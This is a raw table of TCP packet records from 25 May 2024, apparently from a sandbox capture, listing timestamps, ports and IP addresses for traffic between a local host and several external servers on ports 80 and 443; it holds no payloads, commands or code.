May 25, 2024 21:29:52.818190098 CEST	49773	443	192.168.2.4	192.185.16.114
May 25, 2024 21:29:52.818205118 CEST	443	49773	192.185.16.114	192.168.2.4
May 25, 2024 21:29:53.989568949 CEST	443	49772	188.114.96.3	192.168.2.4
May 25, 2024 21:29:53.989779949 CEST	49772	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:54.004002094 CEST	49772	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:54.004075050 CEST	443	49772	188.114.96.3	192.168.2.4
May 25, 2024 21:29:54.004519939 CEST	443	49772	188.114.96.3	192.168.2.4
May 25, 2024 21:29:54.004683971 CEST	49772	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:54.005937099 CEST	49772	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:54.006593943 CEST	443	49773	192.185.16.114	192.168.2.4
May 25, 2024 21:29:54.006700039 CEST	49773	443	192.168.2.4	192.185.16.114
May 25, 2024 21:29:54.008565903 CEST	49773	443	192.168.2.4	192.185.16.114
May 25, 2024 21:29:54.008579969 CEST	443	49773	192.185.16.114	192.168.2.4
May 25, 2024 21:29:54.009073973 CEST	443	49773	192.185.16.114	192.168.2.4
May 25, 2024 21:29:54.012693882 CEST	49773	443	192.168.2.4	192.185.16.114
May 25, 2024 21:29:54.050502062 CEST	443	49772	188.114.96.3	192.168.2.4
May 25, 2024 21:29:54.058495998 CEST	443	49773	192.185.16.114	192.168.2.4
May 25, 2024 21:29:54.169826984 CEST	443	49771	65.109.242.59	192.168.2.4
May 25, 2024 21:29:54.172941923 CEST	49771	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:54.173228979 CEST	49771	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:54.173242092 CEST	443	49771	65.109.242.59	192.168.2.4
May 25, 2024 21:29:54.174590111 CEST	49771	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:54.174597025 CEST	443	49771	65.109.242.59	192.168.2.4
May 25, 2024 21:29:54.424292088 CEST	443	49772	188.114.96.3	192.168.2.4
May 25, 2024 21:29:54.424391985 CEST	443	49772	188.114.96.3	192.168.2.4
May 25, 2024 21:29:54.424633980 CEST	49772	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:54.425707102 CEST	49772	443	192.168.2.4	188.114.96.3
May 25, 2024 21:29:54.425770044 CEST	443	49772	188.114.96.3	192.168.2.4
May 25, 2024 21:29:54.441832066 CEST	443	49773	192.185.16.114	192.168.2.4
May 25, 2024 21:29:54.441900969 CEST	443	49773	192.185.16.114	192.168.2.4
May 25, 2024 21:29:54.441975117 CEST	49773	443	192.168.2.4	192.185.16.114
May 25, 2024 21:29:54.441991091 CEST	443	49773	192.185.16.114	192.168.2.4
May 25, 2024 21:29:54.472762108 CEST	443	49773	192.185.16.114	192.168.2.4
May 25, 2024 21:29:54.472863913 CEST	49773	443	192.168.2.4	192.185.16.114
May 25, 2024 21:29:54.472875118 CEST	443	49773	192.185.16.114	192.168.2.4
May 25, 2024 21:29:54.472933054 CEST	49773	443	192.168.2.4	192.185.16.114
May 25, 2024 21:29:54.519109011 CEST	443	49773	192.185.16.114	192.168.2.4
May 25, 2024 21:29:54.519217968 CEST	49773	443	192.168.2.4	192.185.16.114
May 25, 2024 21:29:54.519233942 CEST	443	49773	192.185.16.114	192.168.2.4
May 25, 2024 21:29:54.521789074 CEST	443	49773	192.185.16.114	192.168.2.4
May 25, 2024 21:29:54.521858931 CEST	49773	443	192.168.2.4	192.185.16.114
May 25, 2024 21:29:54.521866083 CEST	443	49773	192.185.16.114	192.168.2.4
May 25, 2024 21:29:54.561621904 CEST	49774	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:54.573824883 CEST	80	49774	158.160.165.129	192.168.2.4
May 25, 2024 21:29:54.574074030 CEST	49774	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:54.574933052 CEST	49774	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:54.574954033 CEST	49774	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:54.626477957 CEST	80	49774	158.160.165.129	192.168.2.4
May 25, 2024 21:29:54.640814066 CEST	49773	443	192.168.2.4	192.185.16.114
May 25, 2024 21:29:54.671478033 CEST	80	49774	158.160.165.129	192.168.2.4
May 25, 2024 21:29:54.946747065 CEST	443	49771	65.109.242.59	192.168.2.4
May 25, 2024 21:29:54.946810007 CEST	443	49771	65.109.242.59	192.168.2.4
May 25, 2024 21:29:54.946861029 CEST	49771	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:54.946904898 CEST	443	49771	65.109.242.59	192.168.2.4
May 25, 2024 21:29:54.946937084 CEST	49771	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:54.946988106 CEST	49771	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:54.947000027 CEST	443	49771	65.109.242.59	192.168.2.4
May 25, 2024 21:29:54.947035074 CEST	443	49771	65.109.242.59	192.168.2.4
May 25, 2024 21:29:54.947065115 CEST	49771	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:54.947094917 CEST	49771	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:55.092837095 CEST	49771	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:55.092854023 CEST	443	49771	65.109.242.59	192.168.2.4
May 25, 2024 21:29:55.299410105 CEST	80	49774	158.160.165.129	192.168.2.4
May 25, 2024 21:29:55.299633026 CEST	49774	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:55.304130077 CEST	80	49774	158.160.165.129	192.168.2.4
May 25, 2024 21:29:55.304198980 CEST	49774	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:55.305205107 CEST	49775	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:55.312541008 CEST	49776	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:55.312619925 CEST	443	49776	65.109.242.59	192.168.2.4
May 25, 2024 21:29:55.312961102 CEST	49776	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:55.313647985 CEST	49776	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:55.313729048 CEST	443	49776	65.109.242.59	192.168.2.4
May 25, 2024 21:29:55.349529982 CEST	80	49774	158.160.165.129	192.168.2.4
May 25, 2024 21:29:55.404211998 CEST	80	49775	158.160.165.129	192.168.2.4
May 25, 2024 21:29:55.404297113 CEST	49775	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:55.404520035 CEST	49775	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:55.404572964 CEST	49775	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:55.508616924 CEST	80	49775	158.160.165.129	192.168.2.4
May 25, 2024 21:29:55.508635998 CEST	80	49775	158.160.165.129	192.168.2.4
May 25, 2024 21:29:56.083908081 CEST	443	49776	65.109.242.59	192.168.2.4
May 25, 2024 21:29:56.084240913 CEST	49776	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:56.092350006 CEST	49776	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:56.092398882 CEST	443	49776	65.109.242.59	192.168.2.4
May 25, 2024 21:29:56.094816923 CEST	49776	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:56.094868898 CEST	443	49776	65.109.242.59	192.168.2.4
May 25, 2024 21:29:56.295273066 CEST	80	49775	158.160.165.129	192.168.2.4
May 25, 2024 21:29:56.296188116 CEST	49775	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:56.301270962 CEST	49777	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:56.308291912 CEST	80	49775	158.160.165.129	192.168.2.4
May 25, 2024 21:29:56.308377028 CEST	49775	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:56.366200924 CEST	80	49775	158.160.165.129	192.168.2.4
May 25, 2024 21:29:56.417026997 CEST	80	49777	158.160.165.129	192.168.2.4
May 25, 2024 21:29:56.417455912 CEST	49777	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:56.417455912 CEST	49777	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:56.417522907 CEST	49777	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:56.470067024 CEST	80	49777	158.160.165.129	192.168.2.4
May 25, 2024 21:29:56.519372940 CEST	80	49777	158.160.165.129	192.168.2.4
May 25, 2024 21:29:56.918775082 CEST	443	49776	65.109.242.59	192.168.2.4
May 25, 2024 21:29:56.918807983 CEST	443	49776	65.109.242.59	192.168.2.4
May 25, 2024 21:29:56.918900013 CEST	443	49776	65.109.242.59	192.168.2.4
May 25, 2024 21:29:56.918931961 CEST	49776	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:56.918996096 CEST	49776	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:56.979967117 CEST	49776	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:56.980029106 CEST	443	49776	65.109.242.59	192.168.2.4
May 25, 2024 21:29:57.175282955 CEST	80	49777	158.160.165.129	192.168.2.4
May 25, 2024 21:29:57.178145885 CEST	49777	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:57.185842037 CEST	80	49777	158.160.165.129	192.168.2.4
May 25, 2024 21:29:57.186019897 CEST	49777	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:57.231342077 CEST	49778	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:57.233578920 CEST	80	49777	158.160.165.129	192.168.2.4
May 25, 2024 21:29:57.239464998 CEST	80	49778	158.160.165.129	192.168.2.4
May 25, 2024 21:29:57.239552021 CEST	49778	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:57.239689112 CEST	49778	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:57.239712954 CEST	49778	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:57.255249977 CEST	49779	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:57.255331993 CEST	443	49779	65.109.242.59	192.168.2.4
May 25, 2024 21:29:57.255446911 CEST	49779	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:57.255907059 CEST	49779	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:57.255990028 CEST	443	49779	65.109.242.59	192.168.2.4
May 25, 2024 21:29:57.301084995 CEST	80	49778	158.160.165.129	192.168.2.4
May 25, 2024 21:29:57.348172903 CEST	80	49778	158.160.165.129	192.168.2.4
May 25, 2024 21:29:57.990695000 CEST	80	49778	158.160.165.129	192.168.2.4
May 25, 2024 21:29:57.990897894 CEST	49778	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:57.993042946 CEST	49780	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:57.995619059 CEST	80	49778	158.160.165.129	192.168.2.4
May 25, 2024 21:29:57.995701075 CEST	49778	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:58.043555975 CEST	80	49778	158.160.165.129	192.168.2.4
May 25, 2024 21:29:58.045316935 CEST	443	49779	65.109.242.59	192.168.2.4
May 25, 2024 21:29:58.045866013 CEST	49779	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:58.046173096 CEST	49779	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:58.046222925 CEST	443	49779	65.109.242.59	192.168.2.4
May 25, 2024 21:29:58.047350883 CEST	49779	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:58.047368050 CEST	443	49779	65.109.242.59	192.168.2.4
May 25, 2024 21:29:58.049240112 CEST	80	49780	158.160.165.129	192.168.2.4
May 25, 2024 21:29:58.049335957 CEST	49780	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:58.049560070 CEST	49780	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:58.049580097 CEST	49780	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:58.105058908 CEST	80	49780	158.160.165.129	192.168.2.4
May 25, 2024 21:29:58.105088949 CEST	80	49780	158.160.165.129	192.168.2.4
May 25, 2024 21:29:59.008444071 CEST	443	49779	65.109.242.59	192.168.2.4
May 25, 2024 21:29:59.008630037 CEST	443	49779	65.109.242.59	192.168.2.4
May 25, 2024 21:29:59.008788109 CEST	49779	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:59.008788109 CEST	49779	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:59.008898973 CEST	49779	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:59.008938074 CEST	443	49779	65.109.242.59	192.168.2.4
May 25, 2024 21:29:59.018557072 CEST	80	49780	158.160.165.129	192.168.2.4
May 25, 2024 21:29:59.018598080 CEST	80	49780	158.160.165.129	192.168.2.4
May 25, 2024 21:29:59.018699884 CEST	49780	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:59.020016909 CEST	49780	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:59.023370981 CEST	49782	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:59.032260895 CEST	80	49780	158.160.165.129	192.168.2.4
May 25, 2024 21:29:59.032314062 CEST	49780	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:59.082309008 CEST	80	49780	158.160.165.129	192.168.2.4
May 25, 2024 21:29:59.082343102 CEST	80	49782	158.160.165.129	192.168.2.4
May 25, 2024 21:29:59.082494974 CEST	49782	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:59.082948923 CEST	49782	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:59.083168030 CEST	49782	80	192.168.2.4	158.160.165.129
May 25, 2024 21:29:59.109386921 CEST	80	49782	158.160.165.129	192.168.2.4
May 25, 2024 21:29:59.159982920 CEST	80	49782	158.160.165.129	192.168.2.4
May 25, 2024 21:29:59.459492922 CEST	443	49773	192.185.16.114	192.168.2.4
May 25, 2024 21:29:59.459621906 CEST	443	49773	192.185.16.114	192.168.2.4
May 25, 2024 21:29:59.459716082 CEST	49773	443	192.168.2.4	192.185.16.114
May 25, 2024 21:29:59.459774971 CEST	49773	443	192.168.2.4	192.185.16.114
May 25, 2024 21:29:59.459805965 CEST	443	49773	192.185.16.114	192.168.2.4
May 25, 2024 21:29:59.459821939 CEST	49773	443	192.168.2.4	192.185.16.114
May 25, 2024 21:29:59.459830999 CEST	443	49773	192.185.16.114	192.168.2.4
May 25, 2024 21:29:59.746012926 CEST	49783	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:59.746045113 CEST	443	49783	65.109.242.59	192.168.2.4
May 25, 2024 21:29:59.746125937 CEST	49783	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:59.777183056 CEST	49783	443	192.168.2.4	65.109.242.59
May 25, 2024 21:29:59.777204990 CEST	443	49783	65.109.242.59	192.168.2.4
May 25, 2024 21:30:00.538767099 CEST	80	49782	158.160.165.129	192.168.2.4
May 25, 2024 21:30:00.538805962 CEST	80	49782	158.160.165.129	192.168.2.4
May 25, 2024 21:30:00.538834095 CEST	80	49782	158.160.165.129	192.168.2.4
May 25, 2024 21:30:00.538858891 CEST	49782	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:00.538888931 CEST	49782	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:00.539052010 CEST	49782	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:00.543560982 CEST	80	49782	158.160.165.129	192.168.2.4
May 25, 2024 21:30:00.544462919 CEST	49782	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:00.547482967 CEST	49784	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:00.548810959 CEST	80	49782	158.160.165.129	192.168.2.4
May 25, 2024 21:30:00.599684000 CEST	80	49784	158.160.165.129	192.168.2.4
May 25, 2024 21:30:00.599802971 CEST	49784	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:00.599942923 CEST	49784	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:00.599944115 CEST	49784	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:00.609986067 CEST	80	49784	158.160.165.129	192.168.2.4
May 25, 2024 21:30:00.659308910 CEST	80	49784	158.160.165.129	192.168.2.4
May 25, 2024 21:30:00.684447050 CEST	49785	443	192.168.2.4	188.114.96.3
May 25, 2024 21:30:00.684535027 CEST	443	49785	188.114.96.3	192.168.2.4
May 25, 2024 21:30:00.684640884 CEST	49785	443	192.168.2.4	188.114.96.3
May 25, 2024 21:30:00.699857950 CEST	49785	443	192.168.2.4	188.114.96.3
May 25, 2024 21:30:00.699886084 CEST	443	49785	188.114.96.3	192.168.2.4
May 25, 2024 21:30:00.788232088 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:00.788255930 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:00.788414001 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:00.788717985 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:00.788731098 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:01.204833031 CEST	443	49785	188.114.96.3	192.168.2.4
May 25, 2024 21:30:01.204989910 CEST	49785	443	192.168.2.4	188.114.96.3
May 25, 2024 21:30:01.209640026 CEST	49785	443	192.168.2.4	188.114.96.3
May 25, 2024 21:30:01.209669113 CEST	443	49785	188.114.96.3	192.168.2.4
May 25, 2024 21:30:01.210669041 CEST	443	49785	188.114.96.3	192.168.2.4
May 25, 2024 21:30:01.210829973 CEST	49785	443	192.168.2.4	188.114.96.3
May 25, 2024 21:30:01.212294102 CEST	49785	443	192.168.2.4	188.114.96.3
May 25, 2024 21:30:01.224534988 CEST	443	49783	65.109.242.59	192.168.2.4
May 25, 2024 21:30:01.224653006 CEST	49783	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:01.224946022 CEST	49783	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:01.224956036 CEST	443	49783	65.109.242.59	192.168.2.4
May 25, 2024 21:30:01.226998091 CEST	49783	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:01.227003098 CEST	443	49783	65.109.242.59	192.168.2.4
May 25, 2024 21:30:01.227080107 CEST	49783	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:01.227089882 CEST	443	49783	65.109.242.59	192.168.2.4
May 25, 2024 21:30:01.258496046 CEST	443	49785	188.114.96.3	192.168.2.4
May 25, 2024 21:30:01.439007044 CEST	80	49784	158.160.165.129	192.168.2.4
May 25, 2024 21:30:01.439245939 CEST	49784	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:01.442262888 CEST	49787	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:01.444705963 CEST	80	49784	158.160.165.129	192.168.2.4
May 25, 2024 21:30:01.445416927 CEST	49784	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:01.492249012 CEST	80	49784	158.160.165.129	192.168.2.4
May 25, 2024 21:30:01.497056007 CEST	80	49787	158.160.165.129	192.168.2.4
May 25, 2024 21:30:01.497273922 CEST	49787	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:01.497363091 CEST	49787	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:01.497363091 CEST	49787	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:01.499248028 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:01.502027035 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:01.502360106 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:01.502365112 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:01.505203009 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:01.505208015 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:01.549705029 CEST	80	49787	158.160.165.129	192.168.2.4
May 25, 2024 21:30:01.582873106 CEST	80	49787	158.160.165.129	192.168.2.4
May 25, 2024 21:30:01.591806889 CEST	443	49785	188.114.96.3	192.168.2.4
May 25, 2024 21:30:01.591923952 CEST	443	49785	188.114.96.3	192.168.2.4
May 25, 2024 21:30:01.592011929 CEST	49785	443	192.168.2.4	188.114.96.3
May 25, 2024 21:30:01.592379093 CEST	49785	443	192.168.2.4	188.114.96.3
May 25, 2024 21:30:01.592418909 CEST	443	49785	188.114.96.3	192.168.2.4
May 25, 2024 21:30:01.988012075 CEST	443	49783	65.109.242.59	192.168.2.4
May 25, 2024 21:30:01.988208055 CEST	443	49783	65.109.242.59	192.168.2.4
May 25, 2024 21:30:01.988308907 CEST	49783	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.015300035 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.015367985 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.015373945 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.015398026 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.015431881 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.015439987 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.015470982 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.015480042 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.015502930 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.015522957 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.054178953 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.054239035 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.054260015 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.054266930 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.054313898 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.055723906 CEST	49783	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.055798054 CEST	443	49783	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.130328894 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.130393982 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.130429029 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.130435944 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.130464077 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.130487919 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.157607079 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.157656908 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.157704115 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.157711983 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.157752991 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.157752991 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.202047110 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.202090979 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.202138901 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.202143908 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.202173948 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.202183962 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.228111029 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.228152990 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.228193045 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.228199005 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.228226900 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.228239059 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.262936115 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.262993097 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.263032913 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.263040066 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.263072014 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.263083935 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.295753002 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.295804024 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.295830011 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.295835018 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.295861959 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.295874119 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.604545116 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.604562998 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.604608059 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.604762077 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.604763031 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.604784012 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.609781027 CEST	80	49787	158.160.165.129	192.168.2.4
May 25, 2024 21:30:02.609818935 CEST	80	49787	158.160.165.129	192.168.2.4
May 25, 2024 21:30:02.609853029 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.609889984 CEST	49787	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:02.610043049 CEST	49787	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:02.612057924 CEST	49788	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:02.612515926 CEST	80	49787	158.160.165.129	192.168.2.4
May 25, 2024 21:30:02.618019104 CEST	49787	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:02.623501062 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.623552084 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.623611927 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.623636007 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.623806000 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.639688015 CEST	80	49787	158.160.165.129	192.168.2.4
May 25, 2024 21:30:02.639769077 CEST	80	49788	158.160.165.129	192.168.2.4
May 25, 2024 21:30:02.639799118 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.639843941 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.639854908 CEST	49788	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:02.639887094 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.639898062 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.639911890 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.639934063 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.640033007 CEST	49788	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:02.640075922 CEST	49788	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:02.653439999 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.653493881 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.653539896 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.653559923 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.653594017 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.653620958 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.665045023 CEST	80	49788	158.160.165.129	192.168.2.4
May 25, 2024 21:30:02.665074110 CEST	80	49788	158.160.165.129	192.168.2.4
May 25, 2024 21:30:02.665239096 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.665287971 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.665314913 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.665319920 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.665349007 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.665363073 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.675307035 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.675354958 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.675396919 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.675431013 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.675463915 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.675477982 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.684000969 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.684048891 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.684096098 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.684102058 CEST	443	49786	65.109.242.59	192.168.2.4
May 25, 2024 21:30:02.684137106 CEST	49786	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:02.684153080 CEST	49786	443	192.168.2.4	65.109.242.59
